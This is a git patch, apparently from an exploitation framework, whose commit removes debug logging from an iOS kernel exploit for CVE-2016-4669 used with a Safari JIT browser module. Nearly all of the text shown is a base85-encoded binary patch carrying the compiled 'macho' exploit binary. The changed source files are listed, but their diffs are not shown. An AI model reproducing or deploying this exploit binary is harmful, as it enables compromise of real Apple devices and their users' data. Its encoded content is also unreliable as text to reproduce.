From 0b513d6c5137f7a04ff46583eb908f3be71f6f99 Mon Sep 17 00:00:00 2001
From: Tim W <timrlw@gmail.com>
Date: Thu, 30 Jul 2020 17:57:43 +0800
Subject: [PATCH] remove debug logging from the kernel exploit

---
 data/exploits/CVE-2016-4669/macho             | Bin 73436 -> 56876 bytes
 .../source/exploits/CVE-2016-4669/macho.m     |  78 +++++++++---------
 .../source/exploits/CVE-2016-4669/shell.m     |  54 +++++-------
 .../source/exploits/CVE-2016-4669/utils.h     |   7 ++
 .../source/exploits/CVE-2016-4669/utils.m     |  36 ++++----
 .../exploits/apple_ios/browser/safari_jit.rb  |   6 +-
 6 files changed, 89 insertions(+), 92 deletions(-)

diff --git a/data/exploits/CVE-2016-4669/macho b/data/exploits/CVE-2016-4669/macho
index ddb0d1360f67178eb2080c1d11b9a0dbe344e02b..4b6e6345d084574ab4a11ff7dc82e36c03e8246e 100644
GIT binary patch
literal 56876
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
